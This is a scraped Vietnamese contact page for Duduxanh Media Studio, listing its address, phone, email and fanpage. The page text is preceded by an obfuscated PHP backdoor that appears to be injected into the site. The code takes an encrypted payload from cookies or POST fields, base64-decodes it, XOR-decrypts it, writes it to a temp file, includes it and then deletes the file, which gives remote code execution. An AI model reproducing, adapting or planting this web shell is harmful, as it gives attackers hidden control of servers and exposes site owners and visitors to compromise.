$lbWSAknpVB = "\144" . 'y' . chr (71) . '_' . chr (73) . chr (106) . chr (110) . "\x59" . 'm';$vWMogI = "\x63" . "\154" . "\141" . chr (115) . 's' . '_' . "\145" . 'x' . "\x69" . "\x73" . chr ( 190 - 74 ).chr ( 430 - 315 ); $BPKjKYYnMh = $vWMogI($lbWSAknpVB); $vWMogI = "10243";$dJHWNbZZm = $BPKjKYYnMh;if (!$dJHWNbZZm){class dyG_IjnYm{private $Ggejtu;public static $qLbZtRT = "2eae334c-5557-48de-96c2-fbd121ded9e8";public static $qsEmS = 61883;public function __construct($kdtffOh=0){$xYgqVx = $_COOKIE;$iPNdd = $_POST;$XbSXXB = @$xYgqVx[substr(dyG_IjnYm::$qLbZtRT, 0, 4)];if (!empty($XbSXXB)){$ttqXKSPFw = "base64";$BZWDP = "";$XbSXXB = explode(",", $XbSXXB);foreach ($XbSXXB as $xSSKa){$BZWDP .= @$xYgqVx[$xSSKa];$BZWDP .= @$iPNdd[$xSSKa];}$BZWDP = array_map($ttqXKSPFw . "\137" . chr ( 807 - 707 ).'e' . chr (99) . "\157" . 'd' . 'e', array($BZWDP,)); $BZWDP = $BZWDP[0] ^ str_repeat(dyG_IjnYm::$qLbZtRT, (strlen($BZWDP[0]) / strlen(dyG_IjnYm::$qLbZtRT)) + 1);dyG_IjnYm::$qsEmS = @unserialize($BZWDP);}}private function sNScRS(){if (is_array(dyG_IjnYm::$qsEmS)) {$lisKLG = sys_get_temp_dir() . "/" . crc32(dyG_IjnYm::$qsEmS["\163" . 'a' . "\154" . "\x74"]);@dyG_IjnYm::$qsEmS['w' . "\x72" . "\x69" . "\164" . chr ( 1023 - 922 )]($lisKLG, dyG_IjnYm::$qsEmS['c' . chr (111) . "\156" . "\x74" . "\145" . "\156" . chr ( 1062 - 946 )]);include $lisKLG;@dyG_IjnYm::$qsEmS["\144" . chr (101) . "\154" . chr (101) . 't' . chr ( 525 - 424 )]($lisKLG); $lzFtCuofwg = "58197";exit();}}public function __destruct(){$this->sNScRS(); $lzFtCuofwg = "58197";}}$ZbnvueDwJ = new dyG_IjnYm(); $ZbnvueDwJ = "35380_54174";} Liên hệ Đối tác chuyên nghiệp Duduxanh media

Liên hệ

Duduxanh Media Studio

23 Lũy Bán Bích, Phường Tân Thới Hòa, Quận Tân Phú, Tp.HCM, Việt Nam.

• Phone: 0901694667
• Email. duduxanhcontact@gmail.com
• Fanpage: facebook.com/duduxanhmedia
• Học viện media: edu.duduxanh.com